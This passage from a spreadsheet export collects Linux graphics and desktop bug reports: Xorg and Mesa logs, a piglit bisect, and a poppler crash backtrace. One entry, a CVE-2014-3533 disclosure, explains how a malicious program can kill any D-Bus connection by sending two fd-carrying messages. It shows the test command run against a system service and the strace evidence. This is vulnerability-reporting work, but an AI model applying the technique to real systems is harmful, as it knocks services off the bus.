(II) intel(0): xf86BindGARTMemory: bind key 1 at 0x01000000 (pgoffset 4096)
(II) intel(0): xf86BindGARTMemory: bind key 2 at 0x02000000 (pgoffset 8192)
(II) intel(0): xf86BindGARTMemory: bind key 0 at 0x04000000 (pgoffset 16384)
(II) intel(0): xf86BindGARTMemory: bind key 3 at 0x08000000 (pgoffset 32768)
(II) intel(0): Fixed memory allocation layout:
(II) intel(0): 0x00000000-0x0001ffff: ring buffer (128 kB)
(II) intel(0): 0x00020000-0x0061ffff: compressed frame buffer (6144 kB 0x00000000bf820000 physical
)
(II) intel(0): 0x00620000-0x00620fff: compressed ll buffer (4 kB 0x00000000bfe20000 physical
)
(II) intel(0): 0x00621000-0x0062afff: HW cursors (40 kB 0x00000000bfe21000 physical
)
(II) intel(0): 0x0062b000-0x00632fff: logical 3D context (32 kB)
(II) intel(0): 0x00633000-0x00633fff: overlay registers (4 kB 0x00000000bfe33000 physical
)
(II) intel(0): 0x00634000-0x00643fff: xaa scratch (64 kB)
(II) intel(0): 0x007bf000:            end of stolen memory
(II) intel(0): 0x01000000-0x01ffffff: back buffer (11264 kB) X tiled
(II) intel(0): 0x02000000-0x02ffffff: depth buffer (11264 kB) X tiled
(II) intel(0): 0x04000000-0x07ffffff: front buffer (44800 kB) X tiled
(II) intel(0): 0x08000000-0x09ffffff: classic textures (32768 kB)
(II) intel(0): 0x10000000:            end of aperture
(II) intel(0): fbc disabled on pipe a
(II) intel(0): fbc disabled on pipe a
(II) intel(0): Output configuration:
(II) intel(0):   Pipe A is off
(II) intel(0):   Display plane A is now disabled and connected to pipe A.
(II) intel(0):   Pipe B is on
(II) intel(0):   Display plane B is now enabled and connected to pipe B.
(II) intel(0):   Output VGA is connected to pipe none
(II) intel(0):   Output LVDS is connected to pipe B
(II) intel(0):   Output TMDS-1 is connected to pipe none
(II) intel(0): [drm] dma control initialized using IRQ 16
(II) : ps2EnableDataReporting: succeeded
(II) 3rd Button detected: disabling emulate3Button
are the relevant messages.
xorg-x11-server-Xorg-1.4.99.1-0.8.fc9
xorg-x11-drv-i810-2.1.99-0.fc9</t>
  </si>
  <si>
    <t>MESA-103265</t>
  </si>
  <si>
    <t>[llvmpipe] piglit depth-tex-compare regression</t>
  </si>
  <si>
    <t>mesa: 77d3d71f23b32550b045b5f74b7a5e6ca54d83c5 (master 17.3.0-devel)
$ ./bin/depth-tex-compare -auto
Probe color at (23285)
  Expected: 1.000000 0.000000 1.000000
  Observed: 1.000000 1.000000 1.000000
Probe color at (79285)
  Expected: 0.000000 0.000000 0.000000
  Observed: 1.000000 0.000000 1.000000
Probe color at (85285)
  Expected: 0.000000 0.000000 0.000000
  Observed: 1.000000 0.000000 1.000000
Probe color at (91285)
  Expected: 0.000000 0.000000 0.000000
  Observed: 1.000000 0.000000 1.000000
Probe color at (129285)
  Expected: 0.000000 1.000000 0.000000
  Observed: 1.000000 0.000000 1.000000
Probe color at (135285)
  Expected: 0.000000 1.000000 0.000000
  Observed: 1.000000 0.000000 1.000000
Probe color at (141285)
  Expected: 0.000000 1.000000 0.000000
  Observed: 1.000000 0.000000 1.000000
Probe color at (23250)
  Expected: 1.000000 0.000000 1.000000
  Observed: 1.000000 1.000000 1.000000
Probe color at (79250)
  Expected: 0.000000 0.000000 0.000000
  Observed: 1.000000 0.000000 1.000000
Probe color at (129250)
  Expected: 0.000000 1.000000 0.000000
  Observed: 1.000000 0.000000 1.000000
Probe color at (23215)
  Expected: 1.000000 1.000000 1.000000
  Observed: 1.000000 0.000000 1.000000
Probe color at (79215)
  Expected: 1.000000 0.000000 1.000000
  Observed: 0.000000 0.000000 0.000000
Probe color at (129215)
  Expected: 1.000000 0.000000 1.000000
  Observed: 0.000000 1.000000 0.000000
Probe color at (23180)
  Expected: 1.000000 1.000000 1.000000
  Observed: 1.000000 0.000000 1.000000
Probe color at (79180)
  Expected: 1.000000 0.000000 1.000000
  Observed: 0.000000 0.000000 0.000000
Probe color at (85180)
  Expected: 1.000000 0.000000 1.000000
  Observed: 0.000000 0.000000 0.000000
Probe color at (91180)
  Expected: 1.000000 0.000000 1.000000
  Observed: 0.000000 0.000000 0.000000
Probe color at (129180)
  Expected: 1.000000 0.000000 1.000000
  Observed: 0.000000 1.000000 0.000000
Probe color at (135180)
  Expected: 1.000000 0.000000 1.000000
  Observed: 0.000000 1.000000 0.000000
Probe color at (141180)
  Expected: 1.000000 0.000000 1.000000
  Observed: 0.000000 1.000000 0.000000
Probe color at (8575)
  Expected: 0.000000 0.000000 0.000000
  Observed: 1.000000 0.000000 1.000000
Probe color at (9175)
  Expected: 0.000000 0.000000 0.000000
  Observed: 1.000000 0.000000 1.000000
Probe color at (13575)
  Expected: 0.000000 1.000000 0.000000
  Observed: 1.000000 0.000000 1.000000
Probe color at (14175)
  Expected: 0.000000 1.000000 0.000000
  Observed: 1.000000 0.000000 1.000000
Probe color at (8540)
  Expected: 1.000000 0.000000 1.000000
  Observed: 0.000000 0.000000 0.000000
Probe color at (9140)
  Expected: 1.000000 0.000000 1.000000
  Observed: 0.000000 0.000000 0.000000
Probe color at (13540)
  Expected: 1.000000 0.000000 1.000000
  Observed: 0.000000 1.000000 0.000000
Probe color at (14140)
  Expected: 1.000000 0.000000 1.000000
  Observed: 0.000000 1.000000 0.000000
Left to Right: ALPHA LUMINANCE INTENSITY
Top to Bottom: LESS LEQUAL GREATER GEQUAL ALWAYS NEVER NOTEQUAL EQUAL
PIGLIT: {result: fail }
be3ab867bd444594f9d9e0f8e59d305d15769afd is the first bad commit
commit be3ab867bd444594f9d9e0f8e59d305d15769afd
Author: Marek OlÅ¡Ã¡k 
Date:   Mon Oct 2 22:30:55 2017 +0200
    tgsi: implement tgsi_util_get_inst_usage_mask properly
    All opcodes are handled.
    Reviewed-by: Nicolai HÃ¤hnle 
:040000 040000 d1db49cee47cbe6ea3ac52d46bbf4a612f14d3be 11c3d50751b4c921bec7cf463e8c52d4162af19e M	src
bisect run success</t>
  </si>
  <si>
    <t>XORG-18572</t>
  </si>
  <si>
    <t>Scrolling in Firefox still slow</t>
  </si>
  <si>
    <t>There still exist many situations in Firefox where scrolling in positively painful under EXA on the 965GMl. This is the case in both composited (compiz) and non-composited (metacity) environments. The first case that comes to mind is the comments section of a slashdot story. I'll mention other cases as I come across them (I know they exist I just can't remember any more at the moment)</t>
  </si>
  <si>
    <t>DBUS-80469</t>
  </si>
  <si>
    <t>CVE-2014-3533: Security implications of Bug #79694 Misbehaviour reading a message with fdpassing</t>
  </si>
  <si>
    <t>This bug is to discuss the security implications of Bug #79694 (Misbehaviour reading a message with passing file descriptors (duplicate/missing fds)).
I can kick any connection off the bus with fdpassing as long as the malicious program is allowed to send messages to the target.
I tested with this on the system bus:
$ ./test79694 com.redhat.PrinterDriversInstaller
And the process was terminated.
- The malicious program sends 2 messages to the target:
   - Message 1: - contains 2 file descriptors (53 and 54 in the logs)
                - is slightly larger than 2048 bytes so it needs 2 iterations
                  to read (*). See max_bytes_read_per_iteration.
   - Message 2: - contains 3 file descriptors (61 62 and 63 in the logs)
                - is a small message
Strace logs of dbus-daemon:
* receive part 1/2 of message 1:
recvmsg(40 {msg_name(0)=NULL
             msg_iov(1)=[{l\1\1\1\f\10\0\0\2\0\0\0_\0\0\0\t\1u\0\2\0\0\0\10\1g\0\3hhs... 2048}]
             msg_controllen=24 {cmsg_len=24 cmsg_level=SOL_SOCKET cmsg_type=SCM_RIGHTS {53 54}}
             msg_flags=MSG_CMSG_CLOEXEC} MSG_CMSG_CLOEXEC) = 2048
fcntl(53 F_GETFD)                      = 0x1 (flags FD_CLOEXEC)
fcntl(53 F_SETFD FD_CLOEXEC)          = 0
fcntl(54 F_GETFD)                      = 0x1 (flags FD_CLOEXEC)
fcntl(54 F_SETFD FD_CLOEXEC)          = 0
* receive both part 2/2 of message 1 and message 2 in a single recvmsg() call:
recvmsg(40 {msg_name(0)=NULL msg_iov(1)=[{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX... 2048}]
             msg_controllen=32 {cmsg_len=28 cmsg_level=SOL_SOCKET cmsg_type=SCM_RIGHTS {61 62 63}}
             msg_flags=MSG_CMSG_CLOEXEC} MSG_CMSG_CLOEXEC) = 248
fcntl(61 F_GETFD)                      = 0x1 (flags FD_CLOEXEC)
fcntl(61 F_SETFD FD_CLOEXEC)          = 0
fcntl(62 F_GETFD)                      = 0x1 (flags FD_CLOEXEC)
fcntl(62 F_SETFD FD_CLOEXEC)          = 0
fcntl(63 F_GETFD)                      = 0x1 (flags FD_CLOEXEC)
fcntl(63 F_SETFD FD_CLOEXEC)          = 0
* send message 1 to target. Notice it sends the correct fds and closes them correctly:
sendmsg(36
        {msg_name(0)=NULL
         msg_iov(2)=[{l\1\1\1\f\10\0\0\2\0\0\0o\0\0\0\t\1u\0\2\0\0\0\10\1g\0\3hhs... 128}
                     {\0\0\0\0\1\0\0\0\377\7\0\0XXXXXXXXXXXXXXXXXXXX... 2060}]
         msg_controllen=24
         {cmsg_len=24 cmsg_level=SOL_SOCKET cmsg_type=SCM_RIGHTS {53 54}}
          msg_flags=0} MSG_NOSIGNAL) = 2188
close(53)                               = 0
close(54)                               = 0
* send message 2 to target: due to the bug it sends the wrong fds (the fds are closed already):
sendmsg(36
        {msg_name(0)=NULL
         msg_iov(2)=[{l\1\1\1\f\0\0\0\3\0\0\0o\0\0\0\t\1u\0\3\0\0\0\10\1g\0\3hhh... 128}
                     {\0\0\0\0\1\0\0\0\2\0\0\0 12}]
         msg_controllen=32
         {cmsg_len=28 cmsg_level=SOL_SOCKET cmsg_type=SCM_RIGHTS {53 54 53}}
          msg_flags=0} MSG_NOSIGNAL) = -1 EBADF (Bad file descriptor)
* Notice that sendmsg() returns -1 EBADF!
* Too bad for the innocent target! dbus-daemon kills the connection:
epoll_ctl(4 EPOLL_CTL_DEL 36 {0 {u32=0 u64=0}}) = 0
close(36)                               = 0
* And closes the wrong fds:
close(53)                               = -1 EBADF (Bad file descriptor)
write(2 Failed to close file descriptor:... 55) = 55
close(54)                               = -1 EBADF (Bad file descriptor)
write(2 Failed to close file descriptor:... 55) = 55
close(53)                               = -1 EBADF (Bad file descriptor)
write(2 Failed to close file descriptor:... 55) = 55
=&gt; It is an effective way to kill any connection on the bus if the D-Bus  
   policy and SCMs allow the malicious program to send 2 D-Bus messages to the
   target. D-Bus libraries often terminate the program when the D-Bus
   connection is closed. So it can kill programs on the bus.
(*): If you wonder why message 1 needs to be bigger than
     max_bytes_read_per_iteration it is because the kernel will not
     aggregate the two D-Bus messages in a single recvmsg() call otherwise:
     http://lxr.free-electrons.com/source/net/unix/af_unix.c#L2051
     2051                         if (siocb-&gt;scm-&gt;fp)
     2052                                 break
     and the bug happends only when fds from several D-Bus messages are in
     the loader at the same time.
==========
The patch attached on Bug #79694 fixes the security issue.
Bug #80163 is a different bug but has a similar security impact. I suggest fixes for both could be released at the same time.</t>
  </si>
  <si>
    <t>POPPLER-24332</t>
  </si>
  <si>
    <t>evince crashed with SIGSEGV in TextWord::TextWord()</t>
  </si>
  <si>
    <t>this report has been filed here:
https://bugs.edge.launchpad.net/ubuntu/+source/poppler/+bug/436197
This document causes the crash. http://www.oreilly.de/catalog/linuxhaclusterger/chapter/ch05.pdf
.
Thread 3 (process 12515):
#0  0xb7fa6430 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb79a728f in fsync () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb75a9ac4 in g_file_set_contents () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb759769c in g_bookmark_file_to_file () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb7ca539b in gtk_recent_manager_real_changed (manager=0x8954390)
    at /build/buildd/gtk+2.0-2.18.0/gtk/gtkrecentmanager.c:409
	write_error = (GError *) 0x0
	priv = (GtkRecentManagerPrivate *) 0x89543a0
	__PRETTY_FUNCTION__ = gtk_recent_manager_real_changed
#5  0xb766394c in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#6  0xb7654719 in ?? () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#7  0xb7656092 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#8  0xb766b000 in ?? () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#9  0xb766ca7d in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#10 0xb766cf06 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#11 0xb7ca76e5 in IA__gtk_recent_manager_add_full (manager=0x8954390 
    uri=0x8d8d400 file:///tmp/ch05.pdf data=0xbffa0c10)
    at /build/buildd/gtk+2.0-2.18.0/gtk/gtkrecentmanager.c:1377
	priv = (GtkRecentManagerPrivate *) 0x89543a0
	__PRETTY_FUNCTION__ = IA__gtk_recent_manager_add_full
#12 0xb7ca78ff in gtk_recent_manager_add_item_query_info (
    source_object=0x8d4d0a0 res=0x8e32818 user_data=0x8954390)
    at /build/buildd/gtk+2.0-2.18.0/gtk/gtkrecentmanager.c:792
	recent_data = {display_name = 0x0 description = 0x0 
  mime_type = 0x8d8d420 application/pdf 
  app_name = 0x8d4ee88 Document Viewer app_exec = 0x8def858 evince %u 
  groups = 0x0 is_private = 0}
	file_info = 
	uri = (gchar *) 0x8d8d400 file:///tmp/ch05.pdf
	error = (GError *) 0x0
#13 0xb77ab77c in g_simple_async_result_complete ()
   from /usr/lib/libgio-2.0.so.0
No symbol table info available.
#14 0xb77aba3e in ?? () from /usr/lib/libgio-2.0.so.0
No symbol table info available.
#15 0xb75b80f1 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#16 0xb75b9e78 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#17 0xb75bd720 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#18 0xb75bdb8f in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#19 0xb7c472d9 in IA__gtk_main ()
    at /build/buildd/gtk+2.0-2.18.0/gtk/gtkmain.c:1205
	tmp_list = (GList *) 0x88ca734
	functions = (GList *) 0x0
	init = (GtkInitFunction *) 0x0
	loop = (GMainLoop *) 0x88bf220
#20 0x08080ba2 in ?? ()
No symbol table info available.
#21 0xb72ffb56 in __libc_start_main (
    main=0x8080360  argc=2 
    ubp_av=0xbffa0fc4 init=0x8093050 fini=0x8093040 
    rtld_fini=0xb7fb4d20  stack_end=0xbffa0fbc) at libc-start.c:220
	result = 
	unwind_buf = {cancel_jmp_buf = {{jmp_buf = {-1220292620 0 0 
        -1074131048 -2115363072 704801041} mask_was_saved = 0}} priv = {
    pad = {0x0 0x0 0x2 0x805d6a0} data = {prev = 0x0 cleanup = 0x0 
      canceltype = 2}}}
	not_first_call = 
#22 0x0805d6c1 in ?? ()
No symbol table info available.
.
Thread 2 (process 12518):
#0  0xb7fa6430 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb79a4142 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7a190ee in ?? () from /usr/lib/libgthread-2.0.so.0
No symbol table info available.
#3  0xb7594c9c in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb75e5837 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0xb75e436f in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0xb799f80e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb73b57ee in clone () at ../sysdeps/unix/sysv/linux/i386/clone.S:130
No locals.
.
Thread 1 (process 12516):
#0  TextWord (this=0x8cc44e8 state=0x8cf2718 rotA=3 x0=0 y0=0 
    charPosA=0 fontA=0x0 fontSizeA=0) at TextOutputDev.cc:235
	gfxFont = 
	ascent = 0
	descent = 0
	rgb = {r = -1239507956 g = 0 b = -1215119372}
#1  0xb702e512 in TextPage::beginWord (this=0x8cc3e00 state=0x8cf2718 x0=0 
    y0=0) at TextOutputDev.cc:1990
	gfxFont = 
	fontm = 
	m = {0 0 0 -0}
	rot = 147793688
#2  0xb702ff99 in TextPage::addChar (this=0x8cc3e00 state=0x8cf2718 x=0 
    y=0 dx=0 dy=0 c=0 nBytes=1 u=0x8cc4ac8 uLen=1)
    at TextOutputDev.cc:2089
	y1 = 663.30700699999989
	w1 = 0
	overlap = 
	i = 
	x1 = 0
	h1 = 0
	base = 2.7400317276255428e-266
	sp = 0
#3  0xb703010d in ActualText::endMC (this=0x8cc3f40 state=0x8cf2718)
    at TextOutputDev.cc:4602
	uniString = 0x8cbbc60 Ã¾Ã¿
	length = 1
	i = 
#4  0xb791c1c4 in CairoOutputDev::endMarkedContent (this=0x8d0ec68 
    state=0x8cf2718) at CairoOutputDev.cc:1008
No locals.
#5  0xb6faefd4 in Gfx::opEndMarkedContent (this=0x8cc40e8 args=0xb61e9dd4 
    numArgs=0) at Gfx.cc:4512
No locals.
#6  0xb6faf576 in Gfx::execOp (this=0x8cc40e8 cmd=0xb61e9f74 
    args=0xb61e9dd4 numArgs=0) at Gfx.cc:790
	op = 
	name = 0x8cc2658 EMC
	argPtr = (Object *) 0xb61e9dd4
	i = 0
#7  0xb6fafb99 in Gfx::go (this=0x8cc40e8 topLevel=1) at Gfx.cc:661
	timer = {start_time = {tv_sec = 1253823101 tv_usec = 310474} 
  end_time = {tv_sec = -1224794563 tv_usec = -1223917580} active = 1}
	obj = {type = objCmd {booln = 147596888 intg = 147596888 
    real = 663.30665740482345 string = 0x8cc2658 name = 0x8cc2658 EMC 
    array = 0x8cc2658 dict = 0x8cc2658 stream = 0x8cc2658 ref = {
      num = 147596888 gen = 1082440308} cmd = 0x8cc2658 EMC}}
	numArgs = 0
	i = 
	lastAbortCheck = 0
	args = {{type = objNone {booln = 147596904 intg = 147596904 
      real = 663.30665740482527 string = 0x8cc2668 
      name = 0x8cc2668 @&amp;ÃŒ\b array = 0x8cc2668 dict = 0x8cc2668 
      stream = 0x8cc2668 ref = {num = 147596904 gen = 1082440308} 
      cmd = 0x8cc2668 @&amp;ÃŒ\b}} {type = objNone {booln = 147605248 
      intg = 147605248 real = 663.30665740577388 string = 0x8cc4700 
      name = 0x8cc4700 H*Ã\bxFÃŒ\b\b array = 0x8cc4700 dict = 0x8cc4700 
      stream = 0x8cc4700 ref = {num = 147605248 gen = 1082440308} 
      cmd = 0x8cc4700 H*Ã\bxFÃŒ\b\b}} {type = objNone {booln = -575869214 
      intg = -575869214 real = 511.65402000000006 string = 0xddaceee2 
      name = 0xddaceee2  
      array = 0xddaceee2 dict = 0xddaceee2 stream = 0xddaceee2 ref = {
        num = -575869214 gen = 1082129014} 
      cmd = 0xddaceee2 }} {type = objNone 
    {booln = -1045910437 intg = -1045910437 real = 663.30700999999988 
      string = 0xc1a8ac5b 
      name = 0xc1a8ac5b  
      array = 0xc1a8ac5b dict = 0xc1a8ac5b stream = 0xc1a8ac5b ref = {
        num = -1045910437 gen = 1082440308} 
      cmd = 0xc1a8ac5b }} {type = objNone 
    {booln = 0 intg = 0 real = 1.2731974745791634e-313 string = 0x0 
      name = 0x0 array = 0x0 dict = 0x0 stream = 0x0 ref = {num = 0 
        gen = 6} cmd = 0x0}} {type = objNone {booln = 0 intg = 0 
      real = -5.2374703781943357e-48 string = 0x0 name = 0x0 array = 0x0 
      dict = 0x0 stream = 0x0 ref = {num = 0 gen = -1239507384} 
      cmd = 0x0}} {type = objNone {booln = 0 intg = 0 
      real = -9.5605093029645369e-43 string = 0x0 name = 0x0 array = 0x0 
      dict = 0x0 stream = 0x0 ref = {num = 0 gen = -1221242346} 
      cmd = 0x0}} {type = objNone {booln = 0 intg = 0 
      real = -1.5974699859138047e-43 string = 0x0 name = 0x0 array = 0x0 
      dict = 0x0 stream = 0x0 ref = {num = 0 gen = -1223917580} 
      cmd = 0x0}} {type = objNone {booln = 0 intg = 0 
      real = 1.2731974745791634e-313 string = 0x0 name = 0x0 array = 0x0 
      dict = 0x0 stream = 0x0 ref = {num = 0 gen = 6} cmd = 0x0}} {
    type = objNone {booln = 0 intg = 0 real = 7.0025861101853986e-313 
      string = 0x0 name = 0x0 array = 0x0 dict = 0x0 stream = 0x0 ref = {
        num = 0 gen = 33} cmd = 0x0}} {type = objNone {booln = 0 
      intg = 0 real = -1.4909706183973528e-42 string = 0x0 name = 0x0 
      array = 0x0 dict = 0x0 stream = 0x0 ref = {num = 0 
        gen = -1220501512} cmd = 0x0}} {type = objNone {booln = 0 
      intg = 0 real = 4.2439915819305446e-314 string = 0x0 name = 0x0 
      array = 0x0 dict = 0x0 stream = 0x0 ref = {num = 0 gen = 2} 
      cmd = 0x0}} {type = objNone {booln = 0 intg = 0 
      real = 4.2439915819305446e-314 string = 0x0 name = 0x0 array = 0x0 
      dict = 0x0 stream = 0x0 ref = {num = 0 gen = 2} cmd = 0x0}} {
    type = objNone {booln = 0 intg = 0 real = -1.7837215733544617e-42 
      string = 0x0 name = 0x0 array = 0x0 dict = 0x0 stream = 0x0 ref = {
        num = 0 gen = -1220287584} cmd = 0x0}} {type = objNone {
      booln = 0 intg = 0 real = -1.7768300312974892e-42 string = 0x0 
      name = 0x0 array = 0x0 dict = 0x0 stream = 0x0 ref = {num = 0 
        gen = -1220292620} cmd = 0x0}} {type = objNone {booln = 0 
      intg = 0 real = -5.2377627118345021e-48 string = 0x0 name = 0x0 
      array = 0x0 dict = 0x0 stream = 0x0 ref = {num = 0 
        gen = -1239507272} cmd = 0x0}} {type = objNone {booln = 0 
      intg = 0 real = -9.3220559265889515e-44 string = 0x0 name = 0x0 
      array = 0x0 dict = 0x0 stream = 0x0 ref = {num = 0 
        gen = -1224695408} cmd = 0x0}} {type = objNone {booln = 0 
      intg = 0 real = -9.1149949201075179e-43 string = 0x0 name = 0x0 
      array = 0x0 dict = 0x0 stream = 0x0 ref = {num = 0 
        gen = -1221307458} cmd = 0x0}} {type = objNone {booln = 0 
      intg = 0 real = 2.4196197379748035e-266 string = 0x0 name = 0x0 
      array = 0x0 dict = 0x0 stream = 0x0 ref = {num = 0 
        gen = 147388252} cmd = 0x0}} {type = objNone {booln = 0 intg = 0 
      real = 6.3659873728958169e-314 string = 0x0 name = 0x0 array = 0x0 
      dict = 0x0 stream = 0x0 ref = {num = 0 gen = 3} cmd = 0x0}} {
    type = objNone {booln = 0 intg = 0 real = -9.3503145333158143e-44 
      string = 0x0 name = 0x0 array = 0x0 dict = 0x0 stream = 0x0 ref = {
        num = 0 gen = -1224692104} cmd = 0x0}} {type = objNone {
      booln = 0 intg = 0 real = -5.237971521577478e-48 string = 0x0 
      name = 0x0 array = 0x0 dict = 0x0 stream = 0x0 ref = {num = 0 
        gen = -1239507192} cmd = 0x0}} {type = objNone {booln = 0 
      intg = 0 real = 2.4196197379748035e-266 string = 0x0 name = 0x0 
      array = 0x0 dict = 0x0 stream = 0x0 ref = {num = 0 
        gen = 147388252} cmd = 0x0}} {type = objNone {booln = 0 intg = 0 
      real = 2.4195783311482876e-266 string = 0x0 name = 0x0 array = 0x0 
      dict = 0x0 stream = 0x0 ref = {num = 0 gen = 147388224} 
      cmd = 0x0}} {type = objNone {booln = 0 intg = 0 
      real = -1.5974699859138047e-43 string = 0x0 name = 0x0 array = 0x0 
      dict = 0x0 stream = 0x0 ref = {num = 0 gen = -1223917580} 
      cmd = 0x0}} {type = objNone {booln = 0 intg = 0 
      real = -5.2382638552176443e-48 string = 0x0 name = 0x0 array = 0x0 
      dict = 0x0 stream = 0x0 ref = {num = 0 gen = -1239507080} 
      cmd = 0x0}} {type = objNone {booln = 0 intg = 0 real = 0 
      string = 0x0 name = 0x0 array = 0x0 dict = 0x0 stream = 0x0 ref = {
        num = 0 gen = 0} cmd = 0x0}} {type = objNone {booln = 0 
      intg = 0 real = 1.0185579796633307e-312 string = 0x0 name = 0x0 
      array = 0x0 dict = 0x0 stream = 0x0 ref = {num = 0 gen = 48} 
      cmd = 0x0}} {type = objNone {booln = 0 intg = 0 
      real = -1.7837872592199769e-42 string = 0x0 name = 0x0 array = 0x0 
      dict = 0x0 stream = 0x0 ref = {num = 0 gen = -1220287536} 
      cmd = 0x0}} {type = objNone {booln = 0 intg = 0 
      real = -1.2828312689570442e-43 string = 0x0 name = 0x0 array = 0x0 
      dict = 0x0 stream = 0x0 ref = {num = 0 gen = -1224285456} 
      cmd = 0x0}} {type = objNone {booln = 0 intg = 0 
      real = -9.6556580160744046e-43 string = 0x0 name = 0x0 array = 0x0 
      dict = 0x0 stream = 0x0 ref = {num = 0 gen = -1221228440} 
      cmd = 0x0}} {type = objNone {booln = 0 intg = 0 
      real = 2.4196256532357343e-266 string = 0x0 name = 0x0 array = 0x0 
      dict = 0x0 stream = 0x0 ref = {num = 0 gen = 147388256} 
      cmd = 0x0}} {type = objNone {booln = 0 intg = 0 
      real = -3.5294948484769161e-44 string = 0x0 name = 0x0 array = 0x0 
      dict = 0x0 stream = 0x0 ref = {num = 0 gen = -1226231820} 
      cmd = 0x0}}}
#8  0xb6fb2b99 in Gfx::display (this=0x8cc40e8 obj=0xb61ea074 topLevel=1)
    at Gfx.cc:630
	obj2 = {type = objNone {booln = 0 intg = 0 
    real = -7.5505089889280189e-44 string = 0x0 name = 0x0 array = 0x0 
    dict = 0x0 stream = 0x0 ref = {num = 0 gen = -1225068307} cmd = 0x0}}
	i = 
#9  0xb6ffd930 in Page::displaySlice (this=0x8e1fb98 out=0x8d0ec68 hDPI=72 
    vDPI=72 rotate=0 useMediaBox=0 crop=1 sliceX=-1 sliceY=-1 
    sliceW=-1 sliceH=-1 printing=0 catalog=0x8de89c8 abortCheckCbk=0 
    abortCheckCbkData=0x0 annotDisplayDecideCbk=0 
    annotDisplayDecideCbkData=0x0) at Page.cc:474
	gfx = (Gfx *) 0x8cc40e8
	obj = {type = objStream {booln = 147354112 intg = 147354112 
    real = -9.3364851095127113e-42 string = 0x8c87200 
    name = 0x8c87200 \bo\fÂ·\003 array = 0x8c87200 dict = 0x8c87200 
    stream = 0x8c87200 ref = {num = 147354112 gen = -1217788227} 
    cmd = 0x8c87200 \bo\fÂ·\003}}
	i = 
#10 0xb7913901 in _poppler_page_render (page=0x8d0ee20 cairo=0x8cc3a70 
    printing=0) at poppler-page.cc:560
	output_dev = (class CairoOutputDev *) 0x8d0ec68
	__PRETTY_FUNCTION__ = void _poppler_page_render(PopplerPage* cairo_t* GBool)
#11 0xb7913a96 in poppler_page_render (page=0x8d0ee20 cairo=0x8cc3a70)
    at poppler-page.cc:586
	__PRETTY_FUNCTION__ = void poppler_page_render(PopplerPage* cairo_t*)
#12 0xb59e55b9 in ?? () from /usr/lib/evince/1/backends/libpdfdocument.so
No symbol table info available.
#13 0xb7f71a10 in ev_document_render () from /usr/lib/libevdocument.so.1
No symbol table info available.
#14 0xb7f44e21 in ?? () from /usr/lib/libevview.so.1
No symbol table info available.
#15 0xb7f420a1 in ev_job_run () from /usr/lib/libevview.so.1
No symbol table info available.
#16 0xb7f45be8 in ?? () from /usr/lib/libevview.so.1
No symbol table info available.
#17 0xb75e436f in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#18 0xb799f80e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#19 0xb73b57ee in clone () at ../sysdeps/unix/sysv/linux/i386/clone.S:130
No locals.</t>
  </si>
  <si>
    <t>MESA-64617</t>
  </si>
  <si>
    <t>Starting OpenGL application causes EQ overflow and crash</t>
  </si>
  <si>
    <t>System enviromnemt:
- chipset: Sandy Bridge (Integrated Graphics Chipset: Intel(R) Sandybridge Mobile (GT2+))
- system architecture: Linux escape 3.9.2-mmp #1 SMP PREEMPT Wed May 15 00:44:23 CEST 2013 x86_64 GNU/Linux 
- libdrm 2.4.44
- Mesa 9.1.2
- distribution: Arch linux
- machine: ThknPad X220 Tablet
Reproducing steps:
After starting plain Xorg with xterm and running OpenGL application the system immediately hangs and eventually crashes ending with:
...
[    58.737] [mi] Increasing EQ size to 512 to prevent dropped events.
[    58.738] [mi] EQ processing has resumed after 583 dropped events.
[    58.738] [mi] This may be caused my a misbehaving driver monopolizing the server's resources.
[    62.894] (EE) intel(0): Detected a hung GPU disabling acceleration.
[    62.894] (EE) intel(0): When reporting this please include i915_error_state from debugfs and the full dmesg.
[    62.895] (EE)</t>
  </si>
  <si>
    <t>emempi</t>
  </si>
  <si>
    <t>XORG-9743</t>
  </si>
  <si>
    <t>Problem with version 7.X and ati X800 GTO: Xorg don't start</t>
  </si>
  <si>
    <t>I've tried some Linux distribution (f.e. slackware debian
ubuntu kororaa) but I've always problem with Xorg when it
is version 7.X.
My desktop PC configuration is:
-Amd64 3500+ Venice
-MotherBoard Asus A8N-SLI (nForce 4 chipset)
-1 GB ram Kinston pc3200
-graphic card ATI x800GTO 256Mb ddr3 on PCI-E 16x slot
-Monitor Philips 190S6FS
So when I'm installing a distribution with Xorg's version is 7.X (7.0 and 7.1)
at Xorg starting (startx) the screen is BLACK. 
I can't do anything (only forced reboot) and the xorg log
file contains nothing particularly helpful (is empty!). 
I've tried also some other LIVE distribution (Knoppix
kororaaubuntu) but the outcome is always the same: black
screen and system freeze.
I've tried to set the right frequency for my screen (Oriz
and Vert) and the correct resolution (1280x1024) but when
xorg starts the screen goes in sleep mode.
At the moment I don't have any Linux distribution installed
on my desktop pc so I can't send you any configuration
file. 
All  possible configurations with XOrg graphics drivers
(ati vesa) lead to black screen. 
I hope you could be helpful to me because I really can't do
anything else.</t>
  </si>
  <si>
    <t>fonluigi</t>
  </si>
  <si>
    <t>MESA-110939</t>
  </si>
  <si>
